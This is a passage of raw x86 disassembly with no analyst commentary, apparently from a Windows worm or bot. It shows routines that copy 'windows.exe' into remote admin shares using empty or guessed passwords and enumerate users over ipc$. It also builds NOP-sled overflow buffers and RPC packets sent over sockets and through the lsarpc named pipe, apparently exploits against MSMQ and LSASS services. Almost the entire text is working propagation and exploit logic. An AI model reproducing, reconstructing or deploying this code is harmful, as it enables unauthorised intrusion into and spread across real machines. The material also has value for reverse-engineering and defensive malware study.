lea eax, [eax+ecx-30h]
jmp short loc_40F991
; ---------------------------------------------------------------------------
loc_40F98A: ; CODE XREF: sub_40F93D+3D�j
; sub_40F93D+42�j
movsx ecx, cl
lea eax, [eax+ecx-57h]
loc_40F991: ; CODE XREF: sub_40F93D+4B�j
mov ecx, [esp+8+arg_4]
mov [edi+ecx], al
inc edi
inc edx
inc edx
dec esi
jnz short loc_40F959
loc_40F99E: ; CODE XREF: sub_40F93D+11�j
mov eax, edi
pop edi
pop esi
retn
sub_40F93D endp
; =============== S U B R O U T I N E =======================================
sub_40F9A3 proc near ; CODE XREF: sub_40F9CE+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov edx, eax
xor esi, esi
shr edx, 1
jz short loc_40F9CC
push ebx
push edi
mov edi, [esp+0Ch+arg_0]
lea eax, [edi+eax-1]
loc_40F9BA: ; CODE XREF: sub_40F9A3+25�j
mov bl, [esi+edi]
mov cl, [eax]
mov [eax], bl
mov [esi+edi], cl
inc esi
dec eax
cmp esi, edx
jb short loc_40F9BA
pop edi
pop ebx
loc_40F9CC: ; CODE XREF: sub_40F9A3+B�j
pop esi
retn
sub_40F9A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F9CE(char *Str,int)
sub_40F9CE proc near ; CODE XREF: sub_40FA56+69�p
; sub_40FA56+89�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, [ebp+Str]
push esi
push edi
xor esi, esi
push ebx ; Str
mov [ebp+var_4], esi
mov [ebp+var_8], esi
mov edi, ebx
call _strlen
mov [ebp+Str], esi
cmp eax, esi
mov esi, [ebp+arg_4]
pop ecx
mov [ebp+var_C], eax
jbe short loc_40FA41
loc_40F9F8: ; CODE XREF: sub_40F9CE+71�j
mov eax, [ebp+Str]
add eax, ebx
cmp byte ptr [eax], 2Dh
jnz short loc_40FA36
push esi ; int
push edi ; Str
mov byte ptr [eax], 0
call sub_40F93D
cmp [ebp+var_8], 3
jnb short loc_40FA25
mov edi, eax
push edi
push esi
call sub_40F9A3
add esp, 10h
add esi, edi
add [ebp+var_4], edi
jmp short loc_40FA2C
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F9CE+42�j
pop ecx
add esi, eax
add [ebp+var_4], eax
pop ecx
loc_40FA2C: ; CODE XREF: sub_40F9CE+55�j
mov eax, [ebp+Str]
inc [ebp+var_8]
lea edi, [eax+ebx+1]
loc_40FA36: ; CODE XREF: sub_40F9CE+32�j
inc [ebp+Str]
mov eax, [ebp+var_C]
cmp [ebp+Str], eax
jb short loc_40F9F8
loc_40FA41: ; CODE XREF: sub_40F9CE+28�j
push esi ; int
push edi ; Str
mov byte ptr [eax+esi], 0
call sub_40F93D
add eax, [ebp+var_4]
pop ecx
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40F9CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FA56(int,char *Str,char Src,int)
sub_40FA56 proc near ; CODE XREF: .text:0040FBEE�p
var_2C = byte ptr -2Ch
Memory = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
Src = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 9
pop ecx
mov esi, offset a8a885d041ceb11 ; "8a885d04-1ceb-11c9-9fe8-08002b104860"
lea edi, [ebp+var_2C]
rep movsd
push 1 ; SizeOfElements
push 800h ; NumOfElements
movsb
call _calloc
pop ecx
pop ecx
push 1 ; SizeOfElements
push [ebp+Str] ; Str
mov esi, eax
call _strlen
shr eax, 1
inc eax
pop ecx
inc eax
push eax ; NumOfElements
call _calloc
mov [ebp+Memory], eax
xor eax, eax
mov edi, esi
add esi, 10h
inc eax
xor ebx, ebx
mov word ptr [esi], 16D0h
mov word ptr [esi+2], 16D0h
mov [esi+4], ebx
mov [esi+8], eax
mov [esi+0Ch], bx
mov [esi+0Eh], ax
add esi, 10h
push esi ; int
push [ebp+Str] ; Str
call sub_40F9CE
add esi, eax
push 2 ; Size
lea eax, [ebp+Src]
push eax ; Src
push esi ; Dst
call _memcpy
inc esi
inc esi
mov [esi], bl
inc esi
mov [esi], bl
inc esi
lea eax, [ebp+var_2C]
push esi ; int
push eax ; Str
call sub_40F9CE
mov ecx, [ebp+arg_C]
push [ebp+Memory] ; Memory
add esi, eax
mov byte ptr [esi], 2
inc esi
mov [esi], bl
sub esi, edi
inc esi
lea eax, [esi+2]
mov [edi+8], ax
mov eax, [ebp+arg_0]
mov [edi+0Ch], eax
movzx eax, si
inc eax
inc eax
mov byte ptr [edi], 5
mov [edi+1], bl
mov byte ptr [edi+2], 0Bh
mov byte ptr [edi+3], 3
mov dword ptr [edi+4], 10h
mov [edi+0Ah], bx
mov [ecx], eax
call _free
add esp, 28h
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40FA56 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40FB31(int,char *Str)
sub_40FB31 proc near ; CODE XREF: .text:0040FC74�p
; .text:00410831�p
arg_0 = dword ptr 4
Str = dword ptr 8
push esi
mov esi, [esp+4+Str]
push esi ; Str
call _strlen
pop ecx
mov ecx, [esp+4+arg_0]
lea ecx, [ecx+eax*2-1]
jmp short loc_40FB52
; ---------------------------------------------------------------------------
loc_40FB47: ; CODE XREF: sub_40FB31+23�j
dec eax
mov byte ptr [ecx], 0
mov dl, [eax+esi]
dec ecx
mov [ecx], dl
dec ecx
loc_40FB52: ; CODE XREF: sub_40FB31+14�j
test eax, eax
jnz short loc_40FB47
pop esi
retn
sub_40FB31 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1044h
call __alloca_probe
push ebx
xor ebx, ebx
cmp dword_4440DC, ebx
push esi
push edi
jz loc_40FC28
push 9
pop ecx
mov esi, offset aFdb3a030065f11 ; "fdb3a030-065f-11d1-bb9b-00a024ea5525"
lea edi, [ebp-44h]
rep movsd
movsb
xor edi, edi
push ebx
inc edi
push edi
push 2
mov [ebp-4], edi
call dword_444100 ; socket
mov esi, eax
cmp esi, ebx
mov [ebp-0Ch], esi
jl loc_40FC28
push dword ptr [ebp+0A8h]
mov word ptr [ebp-1Ch], 2
call dword_444260 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_44417C ; inet_addr
push 8
mov [ebp-18h], eax
lea eax, [ebp-14h]
push ebx
push eax
call _memset
add esp, 0Ch
push 10h
lea eax, [ebp-1Ch]
push eax
push esi
call dword_4440AC ; connect
test eax, eax
jl short loc_40FC28
lea eax, [ebp-8]
push eax
push edi
lea eax, [ebp-44h]
push eax
push ebx
call sub_40FA56
add esp, 10h
push ebx
push dword ptr [ebp-8]
mov edi, eax
push edi
push esi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40FC21
push ebx
push 1000h
lea eax, [ebp-1044h]
push eax
push esi
call ds:dword_42B208 ; recv
test eax, eax
jg short loc_40FC2F
loc_40FC21: ; CODE XREF: .text:0040FC07�j
push edi
call _free
pop ecx
loc_40FC28: ; CODE XREF: .text:0040FB70�j
; .text:0040FB9B�j ...
xor eax, eax
loc_40FC2A: ; CODE XREF: .text:0040FDBE�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40FC2F: ; CODE XREF: .text:0040FC1F�j
lea eax, [ebp+0Ch]
push eax
call sub_40F87A
push eax
mov [ebp-8], eax
call _strlen
test eax, eax
pop ecx
pop ecx
jz short loc_40FC28
mov edi, 104Ch
push edi
call _malloc
push edi
mov esi, eax
push 90h
push esi
call _memset
push 42h
push offset dword_43FAA8
push esi
call _memcpy
push dword ptr [ebp-8]
lea ebx, [esi+42h]
push ebx
call sub_40FB31
push dword ptr [ebp-8]
call _strlen
push 14h
lea ebx, [ebx+eax*2]
push offset aPrivate ; "\\PRIVATE$\\"
push ebx
call _memcpy
push 18h
mov ebx, offset dword_43FB04
lea eax, [esi+418h]
push ebx
push eax
call _memcpy
add esp, 40h
push 18h
lea eax, [esi+830h]
push ebx
push eax
call _memcpy
push 18h
lea eax, [esi+0C48h]
push offset dword_43FB20
push eax
call _memcpy
push 3Ah
lea ebx, [esi+1B6h]
push offset dword_43FB3C
push ebx
call _memcpy
push 0FFFFh
push 539h
call sub_41B325
mov [ebp-8], eax
add esp, 2Ch
xor eax, 437h
push eax
call dword_444260 ; htons
push 158h
push offset dword_43FB78
add ebx, 3Ah
push ebx
mov word_43FC32, ax
call _memcpy
xor ebx, ebx
inc ebx
lea eax, [ebp+0Ch]
push ebx
push eax
mov byte ptr [esi+104Ah], 0
mov byte ptr [esi+104Bh], 0
call sub_41AA0A
add esp, 14h
cmp eax, 2
jnz short loc_40FD41
mov dword ptr [ebp-4], 8
loc_40FD41: ; CODE XREF: .text:0040FD38�j
cmp eax, 3
jnz short loc_40FD64
mov [ebp-4], ebx
jmp short loc_40FD64
; ---------------------------------------------------------------------------
loc_40FD4B: ; CODE XREF: .text:0040FD68�j
dec dword ptr [ebp-4]
push 0
push edi
push esi
push dword ptr [ebp-0Ch]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40FC28
loc_40FD64: ; CODE XREF: .text:0040FD44�j
; .text:0040FD49�j
cmp dword ptr [ebp-4], 0
jnz short loc_40FD4B
push dword ptr [ebp-0Ch]
call dword_444218 ; closesocket
push 1F4h
call ds:dword_42B014 ; Sleep
push esi
call _free
pop ecx
push dword ptr [ebp-8]
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz loc_40FC28
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
mov eax, ebx
jmp loc_40FC2A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FDC3(int,char *Str1,int,int,int,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40FDC3 proc near ; CODE XREF: sub_410047+37�p
var_6EC = byte ptr -6ECh
var_4E4 = dword ptr -4E4h
var_2E4 = byte ptr -2E4h
Dest = byte ptr -154h
Dst = byte ptr -50h
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = byte ptr 28h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
sub esp, 6ECh
push esi
push edi
push 20h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
mov esi, [ebp+arg_8]
add esp, 0Ch
push edi
push [ebp+arg_0]
lea eax, [ebp+Dst]
push [ebp+Str1]
mov [ebp+var_3C], esi
push eax
mov [ebp+var_4C], 1
mov [ebp+var_40], edi
mov [ebp+var_34], edi
call dword_4441AC
test eax, eax
jz short loc_40FE14
push 0Ah
call ds:dword_42B014 ; Sleep
jmp loc_410034
; ---------------------------------------------------------------------------
loc_40FE14: ; CODE XREF: sub_40FDC3+42�j
push ebx
push 190h
lea eax, [ebp+var_2E4]
push eax
push 0FFFFFFFFh
push esi
push edi
push edi
mov [ebp+var_1C], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_18], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_14], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_10], offset aC ; "c"
mov [ebp+var_C], offset aD_0 ; "d"
mov [ebp+var_8], edi
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E4]
push eax
call dword_44406C
test eax, eax
jnz loc_410030
cmp [ebp+var_8], edi
jz loc_410030
mov [ebp+var_4], edi
mov esi, offset aWindows_exe ; "windows.exe"
loc_40FE7C: ; CODE XREF: sub_40FDC3+150�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_1C]
lea eax, [ebp+Dest]
push [ebp+arg_8]
push offset aSSS_2 ; "%s\\%s\\%s"
push eax ; Dest
call _sprintf
add esp, 14h
push edi
lea eax, [ebp+Dest]
push eax
push esi
call ds:dword_42B048 ; CopyFileA
mov ebx, eax
cmp ebx, edi
jnz short loc_40FF2B
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_40FF0C
lea eax, [ebp+Dest]
push edi
push eax
call sub_42065F
test eax, eax
pop ecx
pop ecx
jnz short loc_40FF0C
call _rand
cdq
push 0Ah
pop ecx
idiv ecx
lea eax, [ebp+Dest]
push eax ; Str
mov ebx, edx
add bl, 30h
call _strlen
pop ecx
lea ecx, [ebp+Dest]
sub ecx, 5
mov [eax+ecx], bl
push edi
lea eax, [ebp+Dest]
push eax
push esi
call ds:dword_42B048 ; CopyFileA
mov ebx, eax
cmp ebx, edi
jnz short loc_40FF2B
loc_40FF0C: ; CODE XREF: sub_40FDC3+F6�j
; sub_40FDC3+109�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_40FE7C
cmp ebx, edi
jnz short loc_40FF2B
push [ebp+var_8]
call dword_444140
jmp loc_410033
; ---------------------------------------------------------------------------
loc_40FF2B: ; CODE XREF: sub_40FDC3+EB�j
; sub_40FDC3+147�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
xor edx, edx
pop ebx
div ebx
xor edx, edx
push 10h ; Size
push edi ; Val
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
lea eax, [ebp+var_30]
push eax ; Dst
mov ebx, edx
call _memset
imul ebx, 0EA60h
add esp, 0Ch
push 208h
lea eax, [ebp+var_6EC]
push eax
push 0FFFFFFFFh
push esi
push edi
push edi
mov [ebp+var_30], ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_6EC]
mov [ebp+var_24], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2E4]
push eax
call dword_4440A8
test eax, eax
jnz loc_410030
push offset byte_42B633 ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
mov eax, offset aNoPassword ; "(no password)"
jz short loc_40FFB7
mov eax, [ebp+Str1]
loc_40FFB7: ; CODE XREF: sub_40FDC3+1EF�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1C]
mov eax, [ebp+arg_B4]
push [ebp+arg_8]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset asc_433314 ; "-"
lea eax, [ebp+var_4E4]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
cmp [ebp+arg_C0], edi
jnz short loc_410012
push edi ; int
push [ebp+arg_BC] ; int
lea eax, [ebp+var_4E4]
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_C] ; int
call sub_40123B
add esp, 14h
loc_410012: ; CODE XREF: sub_40FDC3+230�j
lea eax, [ebp+var_4E4]
push eax
call sub_417D70
mov eax, [ebp+arg_B4]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
pop ecx
loc_410030: ; CODE XREF: sub_40FDC3+A2�j
; sub_40FDC3+AB�j ...
xor edi, edi
inc edi
loc_410033: ; CODE XREF: sub_40FDC3+163�j
pop ebx
loc_410034: ; CODE XREF: sub_40FDC3+4C�j
push 1
push 1
push [ebp+arg_8]
call dword_4440D8
loc_410041: ; DATA XREF: .text:00410419�o
mov eax, edi
pop edi
pop esi
leave
retn
sub_40FDC3 endp
; =============== S U B R O U T I N E =======================================
sub_410047 proc near ; CODE XREF: sub_4100AE+131�p
; sub_4100AE+1A8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp off_43C268, 0
push ebx
push esi
push edi
jz short loc_4100A3
mov eax, offset off_43C268
mov ebx, eax
loc_41005A: ; CODE XREF: sub_410047+5A�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
push [esp+0C8h+arg_4] ; int
lea esi, [esp+0CCh+arg_8]
push dword ptr [eax] ; Str1
rep movsd
push [esp+0D0h+arg_0] ; int
call sub_40FDC3
add esp, 0C8h
cmp eax, 1
jz short loc_4100A9
push 0C8h
call ds:dword_42B014 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_41005A
loc_4100A3: ; CODE XREF: sub_410047+A�j
xor eax, eax
loc_4100A5: ; CODE XREF: sub_410047+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4100A9: ; CODE XREF: sub_410047+45�j
xor eax, eax
inc eax
jmp short loc_4100A5
sub_410047 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100AE proc near ; CODE XREF: sub_40BCF3+1CD�p
; DATA XREF: .data:off_43D87C�o
var_62C = byte ptr -62Ch
var_244 = byte ptr -244h
var_118 = byte ptr -118h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
Dest = byte ptr -30h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+arg_4]
push eax
xor ebx, ebx
lea eax, [ebp+Dest]
push offset aS_1 ; "\\\\%s"
push eax ; Dest
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_18], ebx
call _sprintf
add esp, 0Ch
push 3E8h
lea eax, [ebp+var_62C]
push eax
push 0FFFFFFFFh
lea eax, [ebp+Dest]
push eax
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_118]
push offset aSIpc_0 ; "%s\\ipc$"
push eax ; Dest
mov [ebp+var_40], ebx
mov [ebp+var_34], ebx
mov [ebp+var_4C], ebx
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_118]
mov [ebp+var_3C], eax
push ebx
mov eax, offset byte_42B633
push eax
push eax
lea eax, [ebp+var_50]
push eax
call dword_4441AC
test eax, eax
jz short loc_41014E
push 1
push ebx
lea eax, [ebp+var_118]
push eax
call dword_4440D8
xor eax, eax
jmp loc_410276
; ---------------------------------------------------------------------------
loc_41014E: ; CODE XREF: sub_4100AE+87�j
; sub_4100AE+168�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push ebx
lea eax, [ebp+var_62C]
push eax
call dword_4440E0
push 1
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_118]
push eax
call dword_4440D8
cmp [ebp+var_C], ebx
jz short loc_410191
cmp [ebp+var_C], 0EAh
jnz short loc_4101FE
loc_410191: ; CODE XREF: sub_4100AE+D8�j
mov eax, [ebp+var_4]
cmp eax, ebx
mov [ebp+var_10], eax
jz short loc_41020F
cmp [ebp+var_14], ebx
mov [ebp+var_8], ebx
jbe short loc_4101FE
loc_4101A3: ; CODE XREF: sub_4100AE+14E�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_4101FE
push ebx
push ebx
push 12Ch
lea ecx, [ebp+var_244]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call ds:dword_42B090 ; WideCharToMultiByte
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_244]
lea esi, [ebp+arg_0]
push eax
rep movsd
call sub_410047
add esp, 0C4h
cmp eax, 1
jz short loc_4101FE
add [ebp+var_10], 4
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jb short loc_4101A3
loc_4101FE: ; CODE XREF: sub_4100AE+E1�j
; sub_4100AE+F3�j ...
cmp [ebp+var_4], ebx
jz short loc_41020F
push [ebp+var_4]
call dword_444140
mov [ebp+var_4], ebx
loc_41020F: ; CODE XREF: sub_4100AE+EB�j
; sub_4100AE+153�j
cmp [ebp+var_C], 0EAh
jz loc_41014E
cmp [ebp+var_4], ebx
jz short loc_41022A
push [ebp+var_4]
call dword_444140
loc_41022A: ; CODE XREF: sub_4100AE+171�j
cmp [ebp+var_C], 5
jnz short loc_410273
cmp off_43C218, ebx
jz short loc_410273
mov eax, offset off_43C218
mov [ebp+var_8], eax
loc_410240: ; CODE XREF: sub_4100AE+1C3�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea esi, [ebp+arg_0]
rep movsd
lea ecx, [ebp+Dest]
push ecx
push dword ptr [eax]
call sub_410047
add esp, 0C4h
cmp eax, 1
jz short loc_410273
mov eax, [ebp+var_8]
add eax, 4
cmp [eax], ebx
mov [ebp+var_8], eax
jnz short loc_410240
loc_410273: ; CODE XREF: sub_4100AE+180�j
; sub_4100AE+188�j ...
xor eax, eax
inc eax
loc_410276: ; CODE XREF: sub_4100AE+9B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4100AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41027B proc near ; CODE XREF: .text:004104B4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
lea eax, [esi+esi]
cmp [ebp+arg_C], eax
jnb short loc_41028F
or eax, 0FFFFFFFFh
jmp short loc_4102AE
; ---------------------------------------------------------------------------
loc_41028F: ; CODE XREF: sub_41027B+D�j
xor eax, eax
test esi, esi
jbe short loc_4102AB
mov ecx, [ebp+arg_8]
loc_410298: ; CODE XREF: sub_41027B+2E�j
mov edx, [ebp+arg_0]
mov dl, [eax+edx]
mov [ecx+eax*2], dl
mov byte ptr [ecx+eax*2+1], 0
inc eax
cmp eax, esi
jb short loc_410298
loc_4102AB: ; CODE XREF: sub_41027B+18�j
mov eax, [ebp+arg_C]
loc_4102AE: ; CODE XREF: sub_41027B+12�j
pop esi
pop ebp
retn
sub_41027B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10A8h
call __alloca_probe
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_41AA0A
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_4105A2
push 0FDE8h
push 539h
call sub_41B325
pop ecx
pop ecx
push eax
mov [ebp-8], eax
call dword_444260 ; htons
movzx eax, ax
xor eax, 9999h
mov [ebp-10h], eax
push 2
lea eax, [ebp-10h]
push eax
push offset dword_43FD88
call _memcpy
add esp, 0Ch
mov eax, esi
dec eax
dec eax
jz loc_4103E9
push 8522h
mov dword ptr [ebp-4], 8520h
call ??2@YAPAXI@Z ; operator new(uint)
mov dword ptr [esp], 8521h
xor ebx, ebx
mov esi, eax
push ebx
push esi
call _memset
push 24h
push offset dword_43FEF4
push esi
call _memcpy
mov eax, 1004600h
lea edi, [esi+24h]
mov ecx, 1FFAh
push 2
rep stosd
lea eax, [esi+7FF4h]
push ebx
push eax
call _memset
push 4FAh
lea eax, [esi+7FF6h]
push offset dword_4403E8
push eax
call _memcpy
mov eax, 4001h
push 5
mov [esi+18h], eax
mov [esi+20h], eax
lea eax, [esi+7E0h]
push offset dword_43FE74
push eax
mov dword ptr [esi+8], 8520h
mov dword ptr [esi+10h], 84F0h
call _memcpy
add esp, 3Ch
xor edi, edi
loc_4103B1: ; CODE XREF: .text:004103CC�j
push 1
lea eax, [esi+edi+24h]
push 90h
push eax
call _memset
add esp, 0Ch
inc edi
cmp edi, 1A9h
jle short loc_4103B1
push 195h
lea eax, [esi+3Ch]
push offset dword_43FCD8
push eax
call _memcpy
add esp, 0Ch
jmp loc_4104EB
; ---------------------------------------------------------------------------
loc_4103E9: ; CODE XREF: .text:00410316�j
push 24F2h
mov dword ptr [ebp-4], 24F0h
call ??2@YAPAXI@Z ; operator new(uint)
mov dword ptr [esp], 24F1h
xor ebx, ebx
mov esi, eax
push ebx
push esi
call _memset
push 24h
push offset dword_43FED0
push esi
call _memcpy
mov eax, offset loc_410041
lea edi, [esi+24h]
mov ecx, 800h
push 2
rep stosd
lea eax, [esi+2024h]
push ebx
push eax
call _memset
push 4CAh
lea eax, [esi+2026h]
push offset dword_43FF18
push eax
call _memcpy
mov eax, 1001h
push 4
mov [esi+18h], eax
mov [esi+20h], eax
lea eax, [esi+1654h]
push offset dword_43FE70
push eax
mov dword ptr [esi+8], 24F0h
mov dword ptr [esi+10h], 24C0h
call _memcpy
push 8
lea eax, [esi+165Ch]
push offset off_43FE7C
push eax
call _memcpy
add esp, 48h
mov edi, 32Ah
push edi
call ??2@YAPAXI@Z ; operator new(uint)
push edi
push ebx
push eax
mov [ebp-0Ch], eax
call _memset
push edi
mov edi, [ebp-0Ch]
push edi
push 195h
push offset dword_43FCD8
call sub_41027B
add esp, 20h
cmp eax, 0FFFFFFFFh
jnz short loc_4104D0
push edi
call j__free
pop ecx
loc_4104C8: ; CODE XREF: .text:004106C1�j
xor eax, eax
inc eax
jmp loc_4105A4
; ---------------------------------------------------------------------------
loc_4104D0: ; CODE XREF: .text:004104BF�j
push 328h
lea eax, [esi+1664h]
push edi
push eax
call _memcpy
push edi
call j__free
add esp, 10h
loc_4104EB: ; CODE XREF: .text:004103E4�j
cmp dword ptr [ebp+0A8h], 87h
jz short loc_410517
cmp dword ptr [ebp+0A8h], 1BDh
jz loc_4105A9
cmp dword ptr [ebp+0A8h], 401h
jnz loc_41059B
loc_410517: ; CODE XREF: .text:004104F5�j
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-20h], eax
call dword_444260 ; htons
push ebx
push 1
push 2
mov [ebp-22h], ax
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41059B
push 10h
lea eax, [ebp-24h]
push eax
push edi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_41059B
push ebx
push 48h
push offset dword_43FE88
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41059B
push ebx
push 2710h
lea eax, [ebp-10A8h]
push eax
push edi
call dword_444064 ; recv
push ebx
push dword ptr [ebp-4]
push esi
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz loc_410670
loc_41059B: ; CODE XREF: .text:00410511�j
; .text:0041054A�j ...
push esi
call j__free
loc_4105A1: ; CODE XREF: .text:00410608�j
pop ecx
loc_4105A2: ; CODE XREF: .text:004102D3�j
; .text:004106AA�j
xor eax, eax
loc_4105A4: ; CODE XREF: .text:004104CB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4105A9: ; CODE XREF: .text:00410501�j
lea eax, [ebp-44h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40C89B
test eax, eax
pop ecx
pop ecx
jz short loc_41059B
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-0A8h]
push offset aSPipeLsarpc ; "\\\\%s\\pipe\\lsarpc"
push eax
call _sprintf
add esp, 0Ch
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-0A8h]
push eax
call ds:dword_42B08C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41060A
loc_4105F8: ; CODE XREF: .text:00410650�j
lea eax, [ebp+0Ch]
push eax
call sub_40C979
push esi
call j__free
pop ecx
jmp short loc_4105A1
; ---------------------------------------------------------------------------
loc_41060A: ; CODE XREF: .text:004105F6�j
push ebx
lea eax, [ebp-0Ch]
push eax
push 1000h
lea eax, [ebp-10A8h]
push eax
push 48h
push offset dword_43FE88
push edi
call ds:dword_42B088 ; TransactNamedPipe
cmp byte ptr [ebp-10A6h], 0Ch
jz short loc_410635
push edi
jmp short loc_41064A
; ---------------------------------------------------------------------------
loc_410635: ; CODE XREF: .text:00410630�j
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-4]
push esi
push edi
call ds:dword_42B084 ; WriteFile
test eax, eax
push edi
jnz short loc_410652
loc_41064A: ; CODE XREF: .text:00410633�j
call ds:dword_42B004 ; CloseHandle
jmp short loc_4105F8
; ---------------------------------------------------------------------------
loc_410652: ; CODE XREF: .text:00410648�j
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40C979
push esi
call j__free
pop ecx
pop ecx
push 1F4h
jmp short loc_410684
; ---------------------------------------------------------------------------
loc_410670: ; CODE XREF: .text:00410595�j
push edi
call dword_444218 ; closesocket
push esi
call j__free
mov dword ptr [esp], 1F4h
